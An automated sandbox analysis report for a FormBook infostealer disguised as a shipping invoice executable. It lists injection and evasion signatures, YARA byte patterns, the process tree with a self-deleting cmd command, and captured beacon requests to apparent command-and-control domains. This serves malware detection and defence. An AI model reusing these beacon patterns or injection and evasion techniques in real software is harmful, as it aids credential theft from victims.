Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Shipping INVOICE-BL Shipment..exe

Overview

General Information

Sample Name:Shipping INVOICE-BL Shipment..exe
Analysis ID:323227
MD5:579ba39b6a146080ef6481591440e445
SHA1:06bfc3b47e1ad6a35e10cb4a1edee6c563710107
SHA256:d8d9bb65ea3637fda09488baada0c9b387e0619b7c430b93c8a0fa2d8b489bc1
Tags:Formbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Executable has a suspicious name (potential lure to open the executable)
Hijacks the control flow in another process
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Shipping INVOICE-BL Shipment..exe (PID: 2792 cmdline: 'C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe' MD5: 579BA39B6A146080EF6481591440E445)
    • rundll32.exe (PID: 1748 cmdline: rundll32.exe Prehnite,Lychnises MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 6360 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • netsh.exe (PID: 4768 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • cmd.exe (PID: 6908 cmdline: /c del 'C:\Windows\SysWOW64\cmd.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16679:$sqlite3step: 68 34 1C 7B E1
    • 0x1678c:$sqlite3step: 68 34 1C 7B E1
    • 0x166a8:$sqlite3text: 68 38 2A 90 C5
    • 0x167cd:$sqlite3text: 68 38 2A 90 C5
    • 0x166bb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.cmd.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.cmd.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13855:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13341:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13957:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13acf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x856a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x92e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18947:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x199ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.cmd.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15879:$sqlite3step: 68 34 1C 7B E1
        • 0x1598c:$sqlite3step: 68 34 1C 7B E1
        • 0x158a8:$sqlite3text: 68 38 2A 90 C5
        • 0x159cd:$sqlite3text: 68 38 2A 90 C5
        • 0x158bb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x159e3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.cmd.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.cmd.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Prehnite.dllReversingLabs: Detection: 27%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Shipping INVOICE-BL Shipment..exeVirustotal: Detection: 27%Perma Link
          Source: Shipping INVOICE-BL Shipment..exeReversingLabs: Detection: 44%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 2.2.cmd.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_00406469 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_00402765 FindFirstFileA,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49766
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49767
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 75.126.100.11:80 -> 192.168.2.4:49769
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49771
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.carnesveymacr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS HTTP/1.1Host: www.mehler.photographyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG HTTP/1.1Host: www.thelonerangernews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.hvcharging.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc5176 HTTP/1.1Host: www.jddq888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.wtmailer15.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly HTTP/1.1Host: www.wastie.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.gettingthehelloutofca.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a HTTP/1.1Host: www.caelaabadie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.0.78.24 192.0.78.24
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.carnesveymacr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS HTTP/1.1Host: www.mehler.photographyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG HTTP/1.1Host: www.thelonerangernews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.hvcharging.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc5176 HTTP/1.1Host: www.jddq888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.wtmailer15.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly HTTP/1.1Host: www.wastie.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.gettingthehelloutofca.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a HTTP/1.1Host: www.caelaabadie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.carnesveymacr.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Nov 2020 14:09:00 GMTServer: Apache/2.4.6 (CentOS) PHP/7.3.19Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 71 67 66 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /mqgf/ was not found on this server.</p></body></html>
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Shipping INVOICE-BL Shipment..exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Shipping INVOICE-BL Shipment..exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: nse53A7.tmp.0.drString found in binary or memory: http://openoffice.org/2001/block-list
          Source: explorer.exe, 00000004.00000000.693351563.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: nse53A7.tmp.0.drString found in binary or memory: http://www.businessobjects.com0
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: nse53A7.tmp.0.drString found in binary or memory: http://www.freedesktop.org/standards/shared-mime-info
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_004053CB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: Shipping INVOICE-BL Shipment..exeStatic file information: Suspicious name
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Shipping INVOICE-BL Shipment..exe
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00418180 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00418230 NtReadFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_004182B0 NtClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041817A NtCreateFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_004182DA NtClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_004182AC NtClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B797A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79710 NtQueryInformationToken,LdrInitializeThunk,
